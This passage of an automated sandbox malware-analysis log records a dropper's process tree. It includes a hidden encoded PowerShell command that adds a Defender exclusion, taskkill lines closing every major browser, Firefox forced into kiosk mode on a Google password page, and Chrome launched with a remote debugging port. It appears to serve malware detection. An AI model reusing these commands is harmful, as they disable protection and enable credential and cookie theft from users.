                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 764
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 764
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: 7620ab885d.exe, 00000009.00000003.2063567069.000000000574B000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2093962939.000000000574F000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063391591.0000000005766000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2141141419.0000000005A86000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2142251939.0000000005A69000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2579315822.00000000054DB000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578594447.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2608323246.00000000054DE000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703321855.0000000005966000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703924388.0000000005949000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: cMTqzvmx9u.exe | ReversingLabs: Detection: 50%
                    Source: cMTqzvmx9u.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | File read: C:\Users\user\Desktop\cMTqzvmx9u.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\cMTqzvmx9u.exe "C:\Users\user\Desktop\cMTqzvmx9u.exe"
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                    Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe "C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe "C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe "C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe "C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe | Process created: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe "C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe | Process created: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 1980
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe "C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe"
                    Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe "C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe "C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe"
                    Source: unknown | Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe "C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe "C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                    Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2068,i,843618081044159646,7048051155427762335,262144 /prefetch:8
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                    Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                    Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                    Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                    Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe "C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                    Source: unknown | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                    Source: C:\Program Files\Mozilla Firefox\firefox.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    Source: C:\Program Files\Mozilla Firefox\firefox.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2200 -prefMapHandle 2192 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c580837b-9763-4e9e-ad1e-338f434464c7} 2752 "\\.\pipe\gecko-crash-server-pipe.2752" 20ea916db10 socket
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe "C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe "C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess created: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe "C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeProcess created: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeProcess created: unknown unknown
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeProcess created: unknown unknown
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2068,i,843618081044159646,7048051155427762335,262144 /prefetch:8
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2200 -prefMapHandle 2192 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c580837b-9763-4e9e-ad1e-338f434464c7} 2752 "\\.\pipe\gecko-crash-server-pipe.2752" 20ea916db10 socket
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: mstask.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: dui70.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: duser.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: chartv.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: oleacc.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: atlthunk.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: textinputframework.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: coremessaging.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: coremessaging.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: wtsapi32.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: winsta.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: textshaping.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: explorerframe.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: windows.fileexplorer.common.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
